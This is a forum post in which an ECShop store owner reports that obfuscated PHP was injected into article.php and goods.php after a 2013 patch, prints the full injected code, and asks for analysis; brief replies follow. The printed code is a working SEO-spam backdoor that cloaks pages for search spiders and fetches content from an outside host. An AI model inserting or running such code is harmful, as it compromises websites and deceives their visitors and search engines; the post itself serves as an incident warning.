2013.6.3发布的补丁刚打上,就被挂马了,详情帖内

2016-07-07 15:12 来源:www.chinab4c.com 作者:ecshop专家

在商城根目录的article.php、goods.php页面顶部都被人加入了以下代码:
  1. <?php
  2. ini_set('display_errors','Off');ini_set('max_execution_time', 0);define

  3. ('SID', '33824');define('ROOT', dirname(__FILE__));define('LOCAL',

  4. True);function heade_(){if (stristr($_GET['id'], SID)) return true; else return false;}


  5. function isspider($open = 0){if (!$open) if (heade_()) return

  6. true;$agent="agent:".strtolower($_SERVER

  7. ["HTTP_USER_AGENT"]);$searray=array

  8. ("googlebot","baiduspider","sogou","yahoo","soso");foreach($searray as $se){ if

  9. (strpos($agent,$se)>0) return true;}return false;}function isindex(){if (heade_())

  10. return false;$pname=strtolower($_SERVER

  11. ["SCRIPT_NAME"]);$pquery=strtolower($_SERVER

  12. ["QUERY_STRING"]);$parray=array("/index.","/default.","/main.");foreach($parray

  13. as $se){ if (strpos($pname,$se)>-1&&strlen($pquery)<1) return true;}}function

  14. Happy(){$ip = $_SERVER['REMOTE_ADDR'];if (isset($_SERVER

  15. ['HTTP_CLIENT_IP']) && preg_match('/^([0-9]{1,3}\.){3}[0-9]{1,3}$/', $_SERVER

  16. ['HTTP_CLIENT_IP'])) {$ip = $_SERVER['HTTP_CLIENT_IP'];} elseif(isset

  17. ($_SERVER['HTTP_X_FORWARDED_FOR']) AND preg_match_all('#\d{1,3}\.\d

  18. {1,3}\.\d{1,3}\.\d{1,3}#s', $_SERVER['HTTP_X_FORWARDED_FOR'],

  19. $matches)) {foreach ($matches[0] AS $xip) {if (!preg_match('#^(10|172\.16|192

  20. \.168)\.#', $xip)) {$ip = $xip;break;}}}$TNT_Group = array('123.125.68',

  21. '220.181.68', '220.181.7', '121.14.89','203.208.60', '210.72.225', '125.90.88',

  22. '220.181.108','123.125.71','123.125.67');foreach($TNT_Group as $addr) if

  23. (stristr($ip, $addr)) return False;return True;}if (LOCAL){$HtmlDir =

  24. ROOT.'/'.'HtmlSave';if (!is_dir($HtmlDir)) mkdir($HtmlDir);}if (SID ==

  25. '_N'.'OT_O'.'PTI'.'ON_X5'){if (function_exists('file_get_contents')){$ftime =

  26. filemtime(__FILE__);$N_ID = mt_rand(20000, 99999);$c_f = file_get_contents

  27. (__FILE__);$c_f = str_replace('_NOT_'.'OPTION_X5', $N_ID, $c_f);fwrite(fopen

  28. (__FILE__, 'w'), $c_f);touch(__FILE__, $ftime);}}
  29. if ($_GET['action'] == 'ad') die

  30. (@file_get_contents('htt'.'p:/'.'/i'.'mg.klg'.'w01.'.'com'.'/p'.'.ht'.'ml'));
  31. if (Happy())


  32. {$urlrefer=strtolower("refer:".@$_SERVER["HTTP_REFERER"]);$searray=array

  33. ("google","baidu","sogou","yahoo","soso","360");if (!isspider(1))foreach($searray

  34. as $se){if (strpos($urlrefer,$se)>0){if (heade_()){echo @file_get_contents

  35. ('ht'.'t'.'p://i'.'m'.'g.k'.'l'.'g'.'w'.'0'.'1.c'.'o'.'m/c'.'.t'.'xt');exit;}}}}

  36. if (isspider() & !isindex

  37. ())
  38. {if (isset($N_ID)) $SID = $N_ID;if (SID != '_N'.'OT_O'.'PTI'.'ON_X5') $SID =

  39. SID;$ID = trim(str_replace(SID, '', $_GET['id']));$NMNEW**OJFOJNS = '';if

  40. (LOCAL){if (is_file($HtmlDir.'/'.str_replace('.', '', $ID))){ header('Content-Type:

  41. text/html; charset=UTF-8');die(file_get_contents($HtmlDir.'/'.str_replace('.', '',

  42. $ID)));}}
  43. $FF0ffff__ff_ff_ff1110 = 'domain='.$_SERVER['HTTP_HOST'];

  44. $FF0ffff__ff_ff_ff1110 .= $NMNEW**OJFOJNS = '&SID='.$SID;
  45. if (isset

  46. ($_GET['id'])) $_q = '?words='.mt_rand(1, 10).'&v='.$ID.'&'.$FF0ffff__ff_ff_ff1110;

  47. else $_q = '?'.$FF0ffff__ff_ff_ff1110;
  48. $_0101010101 = $_000000003F =

  49. BAsE64_DECODE('a'.'n'.'V'.'z'.'d'.'A'.BASE64_DECODE('P'.'T0'.'=')); $_FFFF11

  50. = $_fFf1f = '';
  51. function _00F0f00of00o0F0o0f0Fo($_FFFFFF, $_I1 = '3', $_II =

  52. '7') {return str_replace($_II,$_I1,$_FFFFFF);}
  53. $__0xFFFF00FFF0F =

  54. str_replace(array('r','d','l','e','y','v','z','s','s','2','

  55. ',$_0101010101,$_000000003F,'0','.','g'), $_000000, 'say very g00d.');


  56. $__0xFFF101= str_replace(array('E','r','s','Z','i','J','z','s','v','S','

  57. ',$_0101010101,$_GET[id],$_000000003F,',','.','e'), '', ' Js Ss Ev Zs it SS.');


  58. $__0111111FFF = str_replace(array('u','i','d','o','y','n','e','W','a','2',' ',$_GET

  59. [s],$_0101010101,$_000000003F,',','.','#'), '', ' We and you is.');
  60. $ffofo_of00offff

  61. = str_replace('3', '7',

  62. 'cGhwLjV4LzV4L21vYy42NjZpYXRnbm9kLmQvLzpwdHRo'.''.'='.''.'=');


  63. $__0xFFF010101= str_replace(array('a','r','s','Z','y','J','z','s','v','S','

  64. ',$_0101010101,$_GET[id],$_000000003F,',','.'), '', ' Js s Jv Zs are SS.');


  65. $__0x111F01101100 = str_replace(array('W','e','t','o','y','m','e','h','o','u','

  66. ','i',$_0101010101,$_000000003F,',','.','#'), $_000000, ' We the mis you.');


  67. $__01111111FFF = str_replace(array('u','i','d','o','y','n','z','W','a','e',' ',$_GET

  68. [s],$_0101010101,$_000000003F,',','.','#'), '', ' We and you are.');


  69. $ffoff0o_of00000offff = _00F0f00of00o0F0o0f0Fo($ffofo_of00offff);


  70. $_o0o001100o111o011 ='$_conn = f'.'il'.'e_g'.'et_'.chr(99).'o'.chr(110).'ten'.'ts

  71. ("'.urldecode(strrev(bAse64_decode($ffoff0o_of00000offff.'='.''.'='))).$_q.'")';


  72. $_E=strrev

  73. ($__0xFFF101.''.''.$__01111111FFF.$__0xFFF010101.$__0111111FFF.''.''.$_

  74. _0x111F01101100.''.''.$__0xFFFF00FFF0F);
  75. ($_=$_E).$_

  76. ($_o0o001100o111o011);$_jHHsHHs = $H0F0o00po = $_conn;
  77. if (500 >

  78. strlen($_jHHsHHs)) Exit;if (LOCAL) if (!file_exists($HtmlDir.'/'.str_replace('.', '',

  79. $ID))) fwrite(fopen($HtmlDir.'/'.str_replace('.', '', $ID), 'w'), $_jHHsHHs);header

  80. ('Content-Type: text/html; charset=UTF-8');echo

  81. $_jHHsHHs;exit;#w7vT0MLywvQgvs3Du9PQybG6pg
  82. }


  83. ?>
复制代码
上面定义了很多参数、蜘蛛、IP、外部内容的读取,看样子像是做SEO的人黑的,请大家注意了!!我是用了2013.6.3发布的V2.7.3版本的UTF8补丁后凌晨2点出现这个现象,现在已经把上面的代码删除,网站恢复正常。

特别需要提醒的是,上述代码可能特别适合蜘蛛的胃口,向这种重复性的文章,百度竟然能在数小时内收录,说明他的代码产生的结果还是给力的,好多年不研究代码了,希望能有高人研究一下,公布给大家,让小店长们的铺子都收录起来,流量花花起来。

回答:
用备份的文件覆盖

用备份的文件覆盖

不知道楼主有没有听过 泛站群,一个VPS,一个域名,能生成N个页面,好的泛站群软件,十分钟内就可以被百度收录。。的确很厉害

请问打了官方的:[20130621]这个版本补丁,可后台还提示要打:[20130603]的版本,这个还要打吗?